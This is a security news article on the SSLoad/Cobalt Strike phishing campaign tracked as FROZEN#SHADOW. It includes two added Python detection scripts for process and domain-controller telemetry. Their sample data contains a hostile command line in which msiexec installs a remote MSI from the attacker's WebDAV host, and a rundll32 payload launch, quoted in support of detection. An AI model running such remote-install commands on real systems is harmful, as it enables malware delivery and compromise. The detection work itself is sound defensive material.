Cyber security news for all


Researchers Outline Multifaceted Attack Hijacking Systems with SSLoad, Cobalt Strike

An ongoing attack campaign has been observed using phishing emails to deliver a malware family known as SSLoad.

The campaign, which Securonix tracks as FROZEN#SHADOW, also uses Cobalt Strike and the ConnectWise ScreenConnect remote-desktop software to control compromised hosts.

“SSLoad operates covertly, penetrating systems clandestinely, collating sensitive data, and surreptitiously transmitting findings to its orchestrators,” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

“Upon infiltrating a system, SSLoad deploys myriad backdoors and payloads to sustain persistence and evade detection.”

The attack chains begin with phishing emails sent to organizations across Asia, Europe, and the Americas with no obvious targeting pattern. The emails carry links that download a JavaScript file, which starts the infection chain.

Palo Alto Networks recently documented at least two other SSLoad distribution methods: one abuses website contact forms to plant malicious URLs, the other uses macro-enabled Microsoft Word documents.

The Word-document route is notable because it also serves to deliver Cobalt Strike, while the contact-form route has been used to deliver a different malware family, Latrodectus, which is believed to be a successor to IcedID.

The obfuscated JavaScript file (“out_czlrh.js”), when run by wscript.exe, fetches an MSI installer (“slack.msi”) from a network share at “\\wireoneinternet[.]info@80\share” and runs it with msiexec.exe. The “\\host@80\share” form is the UNC syntax of the Windows WebDAV redirector (the WebClient service), so the “share” is an HTTP server rather than an SMB file server; an msiexec.exe command line that points at such a path is a useful detection pivot, since ordinary SMB shares never carry the “@port” element.

The installer then contacts an attacker-controlled domain, retrieves the SSLoad payload, and executes it through rundll32.exe. SSLoad in turn connects to a command-and-control (C2) server and sends details about the compromised system.
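The delivery stages just described (wscript.exe running the .js, msiexec.exe installing from a WebDAV UNC path, rundll32.exe spawned by msiexec.exe) map directly onto process-creation telemetry. The following is an added example, not code from Securonix, Palo Alto Networks or The Hacker News: it scores constructed, Sysmon Event ID 1-style records against those three stages. The field names follow Sysmon, the hostname is the one quoted above, and the payload DLL name and all process IDs are made up for the example.

```python
"""Process-telemetry check for the SSLoad delivery chain described above.

Added example (not the researchers' code). Records are constructed in the
shape of Sysmon Event ID 1; the three stages checked are:
  1. wscript.exe running a .js file,
  2. msiexec.exe installing an MSI from a WebDAV-style UNC path (\\host@80\share),
  3. rundll32.exe spawned by msiexec.exe.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    cmdline: str       # its command line
    parent_image: str  # full path of the parent process


# Windows WebClient (WebDAV mini-redirector) UNC syntax: \\host@port\share or
# \\host@SSL\share. SMB shares never carry the "@port" element, so its presence
# in an msiexec command line is a strong signal on its own.
WEBDAV_UNC = re.compile(r"\\\\[A-Za-z0-9.\-\[\]]+@(?:\d{1,5}|SSL)\\", re.IGNORECASE)


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def is_wscript_js(e: ProcEvent) -> bool:
    """Stage 1: Windows Script Host executing a .js/.jse file."""
    return basename(e.image) == "wscript.exe" and re.search(r"\.jse?\b", e.cmdline, re.I) is not None


def is_msiexec_webdav(e: ProcEvent) -> bool:
    """Stage 2: msiexec.exe installing from a WebDAV UNC path."""
    return basename(e.image) == "msiexec.exe" and WEBDAV_UNC.search(e.cmdline) is not None


def is_rundll32_from_msiexec(e: ProcEvent) -> bool:
    """Stage 3: rundll32.exe whose parent is msiexec.exe (an MSI custom action)."""
    return basename(e.image) == "rundll32.exe" and basename(e.parent_image) == "msiexec.exe"


def triage(events):
    """Return per-stage hits plus any full wscript -> msiexec -> rundll32 lineage.

    Stages are reported individually as well, because the Windows Installer
    service (a second msiexec.exe running as SYSTEM) often sits between the
    client msiexec.exe and the custom action and breaks a strict parent-pid walk.
    """
    by_pid = {e.pid: e for e in events}
    hits = {"wscript_js": [], "msiexec_webdav": [], "rundll32_from_msiexec": [], "lineage": []}
    for e in events:
        if is_wscript_js(e):
            hits["wscript_js"].append(e.pid)
        if is_msiexec_webdav(e):
            hits["msiexec_webdav"].append(e.pid)
        if is_rundll32_from_msiexec(e):
            hits["rundll32_from_msiexec"].append(e.pid)
            msi = by_pid.get(e.ppid)
            ws = by_pid.get(msi.ppid) if msi else None
            if msi and ws and is_msiexec_webdav(msi) and is_wscript_js(ws):
                hits["lineage"].append((ws.pid, msi.pid, e.pid))
    hits["all_stages_seen"] = all(
        hits[k] for k in ("wscript_js", "msiexec_webdav", "rundll32_from_msiexec"))
    return hits


# Constructed sample telemetry: one malicious chain (pids 412 -> 520 -> 610)
# and two benign look-alikes. "payload.dll" is a placeholder name.
SAMPLE_EVENTS = [
    ProcEvent(412, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\out_czlrh.js"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(520, 412, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i \\wireoneinternet[.]info@80\share\slack.msi /qn",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(610, 520, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\ProgramData\payload.dll,Start",
              r"C:\Windows\System32\msiexec.exe"),
    # Benign: a local MSI install started from Explorer.
    ProcEvent(700, 100, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Temp\7zip.msi",
              r"C:\Windows\explorer.exe"),
    # Benign: rundll32 launched by a service host, not by msiexec.
    ProcEvent(710, 300, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL",
              r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for stage, value in triage(SAMPLE_EVENTS).items():
        print(f"{stage}: {value}")
```

Each stage is a reasonable standalone hunt (msiexec.exe with an "@port" UNC path in particular has very few legitimate uses); the lineage match is the high-confidence alert, and "all_stages_seen" covers the case where the installer service has broken the parent link.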

This initial reconnaissance paves the way for Cobalt Strike, a legitimate adversary-simulation framework, which is then used to download and install ScreenConnect so the attackers can remotely control the compromised host.

“Upon attaining unrestricted access to the system, the adversaries commence efforts to procure credentials and harvest other vital system particulars,” the researchers said. “At this juncture, they commence scanning the victimized host for credentials stored within files and other potentially sensitive documents.”

The attackers were also seen moving laterally to other systems on the network, including the domain controller, ultimately taking over the victim’s Windows domain by creating their own domain administrator account.

“Such a degree of access enables them to infiltrate any interconnected machine within the domain,” the researchers said. “Ultimately, this scenario epitomizes the worst-case scenario for any organization, given that remediation of the persistence achieved by the attackers would be exorbitantly time-consuming and financially burdensome.”
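The domain takeover above leaves a small, distinctive trail on the domain controller: an account creation (Security Event ID 4720) followed shortly by that account being added to a privileged group (4728 for global groups such as Domain Admins, 4756 for universal groups such as Enterprise Admins, 4732 for domain-local groups such as Administrators). The following is an added example, not Securonix’s code; it correlates constructed Security log records whose field names follow the real event schema (TargetUserName, SubjectUserName, MemberName) but whose values, accounts and timestamps are made up.

```python
"""Correlate account creation with privileged-group membership, as in the
domain takeover described above.

Added example (not the researchers' code). Records are constructed; field
names follow the Windows Security event schema. A 4720 (account created)
followed within a window by a 4728/4732/4756 adding that account to a
privileged group is reported.
"""
from datetime import datetime, timedelta

# Lower-cased group names compared against the TargetUserName of a group-add event.
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}


def sam_from_member(member_name: str) -> str:
    """Group-add events carry the member as a DN ("CN=svc_backup,CN=Users,...");
    4720 carries a plain sAMAccountName. Normalise both to a lower-case name."""
    for rdn in member_name.split(","):
        rdn = rdn.strip()
        if rdn.upper().startswith("CN="):
            return rdn[3:].lower()
    return member_name.lower()


def new_privileged_accounts(events, window=timedelta(hours=24)):
    """Return findings as (account, created_by, group, minutes_between)."""
    ordered = sorted(events, key=lambda e: e["time"])
    created = {}
    for ev in ordered:
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = ev
    findings = []
    for ev in ordered:
        if ev["EventID"] not in GROUP_ADD_EVENTS:
            continue
        if ev["TargetUserName"].lower() not in PRIVILEGED_GROUPS:
            continue
        member = sam_from_member(ev["MemberName"])
        origin = created.get(member)
        if origin is None:
            continue  # long-standing account: not what this rule targets
        delta = ev["time"] - origin["time"]
        if timedelta(0) <= delta <= window:
            findings.append((member, origin["SubjectUserName"], ev["TargetUserName"],
                             int(delta.total_seconds() // 60)))
    return findings


# Constructed sample log: one attacker-style sequence, one routine onboarding,
# one existing admin re-added to Domain Admins.
T = datetime(2024, 4, 20, 2, 0)
SAMPLE_EVENTS = [
    {"time": T, "EventID": 4720, "TargetUserName": "svc_backup", "SubjectUserName": "jsmith"},
    {"time": T + timedelta(minutes=7), "EventID": 4728, "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_backup,CN=Users,DC=corp,DC=example", "SubjectUserName": "jsmith"},
    {"time": T + timedelta(hours=7), "EventID": 4720, "TargetUserName": "bnewhire",
     "SubjectUserName": "hr_provisioner"},
    {"time": T + timedelta(hours=7, minutes=2), "EventID": 4728, "TargetUserName": "Sales",
     "MemberName": "CN=bnewhire,CN=Users,DC=corp,DC=example", "SubjectUserName": "hr_provisioner"},
    {"time": T + timedelta(hours=9), "EventID": 4728, "TargetUserName": "Domain Admins",
     "MemberName": "CN=da_oncall,CN=Users,DC=corp,DC=example", "SubjectUserName": "jsmith"},
]

if __name__ == "__main__":
    for account, creator, group, minutes in new_privileged_accounts(SAMPLE_EVENTS):
        print(f"{account} created by {creator}, added to {group} after {minutes} min")
```

The rule is deliberately narrow: it flags only accounts that were both created and elevated inside the window, which is the FROZEN#SHADOW pattern, and leaves additions of pre-existing accounts to a separate, noisier review. The creator (SubjectUserName) is worth recording because it is usually the credential the attackers harvested earlier in the intrusion.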

The disclosure coincides with a report from the AhnLab Security Intelligence Center (ASEC) on Linux systems being infected with Pupy RAT, an open-source remote access trojan.
